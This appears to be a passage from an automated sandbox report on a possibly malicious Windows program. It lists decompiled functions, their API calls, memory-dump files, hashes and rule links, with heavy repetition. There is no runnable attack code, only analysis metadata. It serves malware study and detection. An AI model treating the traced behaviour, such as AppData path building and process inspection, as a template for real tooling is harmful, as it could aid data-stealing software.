                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Copy_strstd::exception::_
                            • String ID: Unknown exception
                            • API String ID: 356497065-410509341
                            • Opcode ID: 2460fe8681aa2102f4db070b162f63355c381bc40a5f035b010666d3f02072e8
                            • Instruction ID: a1d019a470fe4d46411d77303d5e733feb11dbc6778a1c9c929d3f0180f90fb6
                            • Opcode Fuzzy Hash: 2460fe8681aa2102f4db070b162f63355c381bc40a5f035b010666d3f02072e8
                            • Instruction Fuzzy Hash: 1AF0C23231C219EFCB21CF68D849ABABBAAAF55741F148469FA84C7311C375D8029B95
                            Function 006EE500 Relevance: 6.2, APIs: 4, Instructions: 150stringCOMMON
                            Download Yara Rule
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006EE544
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EE573
                            • lstrcat.KERNEL32(?,00000000), ref: 006EE581
                            • lstrcat.KERNEL32(?,0101E6D8), ref: 006EE59C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: bc4dcdc3bd1aeaf96a85847c0c12b3dc2477182220feeac8465fcdf1a592d4d3
                            • Instruction ID: abf2a01a2f8598263da641d02baca7d5467da0a9208abd9df0fe8bf1a1bb3678
                            • Opcode Fuzzy Hash: bc4dcdc3bd1aeaf96a85847c0c12b3dc2477182220feeac8465fcdf1a592d4d3
                            • Instruction Fuzzy Hash: 3A5182B5A2011CAFD794EB54EC52EEA337EEF48300F44446DBA4587341EA71AE458BA4
                            Function 006F1FD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95stringCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 006F1FDF, 006F1FF5, 006F20B7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: strlen
                            • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                            • API String ID: 39653677-4138519520
                            • Opcode ID: ac514209981422d7018e1dbdbeaace3c6de09e106ae0ab28b076105dd7611635
                            • Instruction ID: f7bf9b3be10072e671469532752e1f4927f4c86f1d6d24f4c6c6f0c6928101f4
                            • Opcode Fuzzy Hash: ac514209981422d7018e1dbdbeaace3c6de09e106ae0ab28b076105dd7611635
                            • Instruction Fuzzy Hash: 5F21483651018F8AC720EA35C4A46FDF7A7EF803A1F844156CA180B381EB36194ADF96
                            Function 006EEB70 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON
                            Download Yara Rule
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006EEBB4
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EEBE3
                            • lstrcat.KERNEL32(?,00000000), ref: 006EEBF1
                            • lstrcat.KERNEL32(?,0101F1F0), ref: 006EEC0C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: b0b8f058ae67eccdee5913ba1775058dbdee68409f188d04fb77d2de123186da
                            • Instruction ID: f7df9dc8553132f941a683bd9218d92f413a510d8609ecb54abfbe35a8a96330
                            • Opcode Fuzzy Hash: b0b8f058ae67eccdee5913ba1775058dbdee68409f188d04fb77d2de123186da
                            • Instruction Fuzzy Hash: 7731A4B1E1011DAFCB61EF64DC51BEE73B5EF58300F1414A9BA169B351DE309E448B94
                            Function 006F4480 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                            Download Yara Rule
                            APIs
                            • OpenProcess.KERNEL32(00000410,00000000), ref: 006F4492
                            • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 006F44AD
                            • CloseHandle.KERNEL32(00000000), ref: 006F44B4
                            • lstrcpy.KERNEL32(00000000,?), ref: 006F44E7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                            • String ID:
                            • API String ID: 4028989146-0
                            • Opcode ID: 61b4d2aef9cb0c27d0f676cb3d8055f25af4917f6f774db11e0b34878d7cdf6f
                            • Instruction ID: e597c6671c260047159f3368e180f88f29b82eedb62bc40b3ee989b15cbdb112
                            • Opcode Fuzzy Hash: 61b4d2aef9cb0c27d0f676cb3d8055f25af4917f6f774db11e0b34878d7cdf6f
                            • Instruction Fuzzy Hash: CCF0C8B09056192FE7209B749C49BFB76E9EF14304F004591EB85E7280DAB088848790
                            Function 006F8FD1 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __getptd.LIBCMT ref: 006F8FDD
                              • Part of subcall function 006F87FF: __amsg_exit.LIBCMT ref: 006F880F
                            • __getptd.LIBCMT ref: 006F8FF4
                            • __amsg_exit.LIBCMT ref: 006F9002
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 006F9026
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: 36fd3d6ff68f7ce728837d12de1887d34083b97f16dca8db3b5e160397242e9c
                            • Instruction ID: b5fa703a8835e562abcc305b0505d553d33e4b784b9096a4666bf9ffe4ddcaa7
                            • Opcode Fuzzy Hash: 36fd3d6ff68f7ce728837d12de1887d34083b97f16dca8db3b5e160397242e9c
                            • Instruction Fuzzy Hash: ACF0F632908618CFD7A0BB789807B7D33A36F00760F24425CF210672D2CF681840DA6D
                            Function 006F7310 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(------,006D5BEB), ref: 006F731B
                            • lstrcpy.KERNEL32(00000000), ref: 006F733F
                            • lstrcat.KERNEL32(?,------), ref: 006F7349
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcatlstrcpylstrlen
                            • String ID: ------
                            • API String ID: 3050337572-882505780
                            • Opcode ID: 8da7c0db24fa39fb9480b78c2c112cdeabf841c4c3756df3384e49edd13c1782
                            • Instruction ID: bc990791a69f3ff8301d0f0a51b5e4e03fa17a4cb12b33e0057f1fa38be4c09e
                            • Opcode Fuzzy Hash: 8da7c0db24fa39fb9480b78c2c112cdeabf841c4c3756df3384e49edd13c1782
                            • Instruction Fuzzy Hash: 67F0C9B5A15702AFDB649F35D858927BAFAFF84701318882DA8DAC7315EB30D840EB50
                            Function 006E33D0 Relevance: 5.5, APIs: 4, Instructions: 486stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D1557
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D1579
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D159B
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D15FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E3422
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E344B
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E3471
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E3497
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: d86bd70bb0a701f9f6e5f6a2d07623b06f387596f6a3286c4f14dc9c81f802a5
                            • Instruction ID: bea40465acfcfbe5d6cc6fa56054c63d9eff1185dbd5ccebd5aaa685350ed504
                            • Opcode Fuzzy Hash: d86bd70bb0a701f9f6e5f6a2d07623b06f387596f6a3286c4f14dc9c81f802a5
                            • Instruction Fuzzy Hash: 6E120DB0A163619FDB58CF1AC558B65B7E6AF44318B19C0AEE409CB3A2D772DD42CF40
                            Function 006E7C20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 006E7C94
                            • std::_Xinvalid_argument.LIBCPMT ref: 006E7CAF
                              • Part of subcall function 006E7D40: std::_Xinvalid_argument.LIBCPMT ref: 006E7D58
                              • Part of subcall function 006E7D40: std::_Xinvalid_argument.LIBCPMT ref: 006E7D76
                              • Part of subcall function 006E7D40: std::_Xinvalid_argument.LIBCPMT ref: 006E7D91
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_
                            • String ID: string too long
                            • API String ID: 909987262-2556327735
                            • Opcode ID: 3c85732ac7e68f8379aeeb42688d02a595f4c5f762720f2f4c19e7681d9afbce
                            • Instruction ID: bc31f5345433fa282b1fac2547d68137cc5a262a34e0cbcdc85204c01bfb56b8
                            • Opcode Fuzzy Hash: 3c85732ac7e68f8379aeeb42688d02a595f4c5f762720f2f4c19e7681d9afbce
                            • Instruction Fuzzy Hash: 9B31F8B230A3948FD724DE6DE88096AF3EFDF91B50B30466AF5418B741D7719C418395
                            Function 006D6EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,?), ref: 006D6F74
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006D6F7B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcess
                            • String ID: @
                            • API String ID: 1357844191-2766056989
                            • Opcode ID: a6cb7329c6676758da8caa231f93b70ce5b7be6cb9bb3f8fc59d82364dff39ab
                            • Instruction ID: 32247aafc3f21bd4afb345c6c6bd7cd9caaa652c6b2abb18dbc198fc91a3d033
                            • Opcode Fuzzy Hash: a6cb7329c6676758da8caa231f93b70ce5b7be6cb9bb3f8fc59d82364dff39ab
                            • Instruction Fuzzy Hash: F0216FB1A00A019BEB208F20D884BBA73BAEB45704F444869F946CB785F775E945C751
                            Function 006F2400 Relevance: 5.2, APIs: 4, Instructions: 234stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006F244C
                            • lstrlen.KERNEL32(00000000), ref: 006F24E9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F2570
                            • lstrlen.KERNEL32(00000000), ref: 006F2577
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
